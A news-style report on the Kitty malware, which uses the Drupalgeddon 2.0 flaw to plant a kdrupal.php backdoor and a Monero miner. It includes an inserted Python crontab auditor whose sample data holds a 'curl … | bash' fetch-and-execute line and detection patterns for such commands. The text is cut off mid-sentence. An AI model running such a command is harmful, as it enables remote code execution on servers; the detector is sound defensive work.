
The latest version of the Kitty malware family is targeting Drupal websites in an effort to mine cryptocurrency.

According to researchers from Imperva's Incapsula, Kitty is the latest malware to attack the Drupal content management system (CMS) for the purpose of cryptojacking[1].

It has been just over a month since the Drupalgeddon 2.0 (CVE-2018-7600[2]) exploit was published. The vulnerability, deemed "highly critical," is a remote code execution bug present in Drupal versions 7.x and 8.x.

The vulnerability allows threat actors to employ various attack vectors to compromise Drupal websites. Scanning, backdoor implementation, and cryptocurrency mining are all possible, as well as data theft and account hijacking.

Drupalgeddon 2.0 is caused by insufficient sanitization of array objects in Drupal's core modules, which allows for remote code execution. This vulnerability has become an entry point for other forms of malware to take root in Drupal setups, including the Kitty malware.

What makes Kitty different is that it does not stop at compromising the internal network, server, and website itself to mine cryptocurrency: the malware also targets visitors to compromised domains.

Kitty, a Monero cryptocurrency miner which uses open-source mining software for browsers, executes a bash script, kdrupal.php, which is written to the infected server's disk. This establishes a backdoor into the infected system that is separate from the Drupal vulnerability.

A scheduler then re-downloads and executes the script every minute, which not only keeps the infection persistent but also allows attackers to push updates to the Kitty malware on infected servers quickly.
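The every-minute re-download described above leaves a recognisable scheduler entry that defenders can audit for. The following Python code is an added example, not code from the article or from Imperva; it assumes the scheduler is cron with user-crontab syntax, and the regexes and the sample crontab are constructed for illustration (only the names kdrupal.php and kkworker come from the article).

```python
import re

# "kdrupal.php" and "kkworker" are the names given in the article.
# Treating the scheduler as cron, and every regex below, is an assumption.
PAGE_NAMES = ("kdrupal.php", "kkworker")
FETCH = re.compile(r"\b(?:curl|wget)\b")
# An interpreter at the start of the command or after |, ; or &.
RUN = re.compile(r"(?:^|[|;&])\s*(?:\S*/)?(?:(?:ba|da|z)?sh|php)\b")
ENV_LINE = re.compile(r"^\w+\s*=")


def runs_every_minute(fields):
    """True when the five time fields mean 'every minute of every day'."""
    return fields[0] in ("*", "*/1") and all(f == "*" for f in fields[1:5])


def audit_crontab(text):
    """Return [(line_number, [reasons], line)] for suspicious entries."""
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # Names from the article are checked on the whole line, so
        # @reboot-style entries are covered as well.
        reasons = [f"page name: {n}" for n in PAGE_NAMES if n in line]
        fields = line.split(None, 5)
        if (len(fields) == 6 and runs_every_minute(fields)
                and FETCH.search(fields[5]) and RUN.search(fields[5])):
            reasons.append("every-minute download and execute")
        if reasons:
            findings.append((number, reasons, line))
    return findings


# Constructed sample crontab; the URLs and paths are made up.
SAMPLE = """\
PATH=/usr/bin:/bin
# nightly backup
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://example.invalid/u.sh | bash
*/5 * * * * php /var/www/html/cron.php
* * * * * /tmp/kkworker -c /tmp/cfg
15 * * * * wget -q https://example.invalid/feed.xml -O /var/cache/feed.xml
"""

if __name__ == "__main__":
    for number, reasons, line in audit_crontab(SAMPLE):
        print(f"line {number}: {', '.join(reasons)} :: {line}")
```

In practice the input would be the output of `crontab -l` for the web server account; a hit is a lead for triage, not proof of compromise.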

When the server is firmly under the attacker's control, the "kkworker" Monero cryptocurrency miner is then installed and executed. Any cryptocurrency mined through the stolen power

Read more from our friends at ZDNet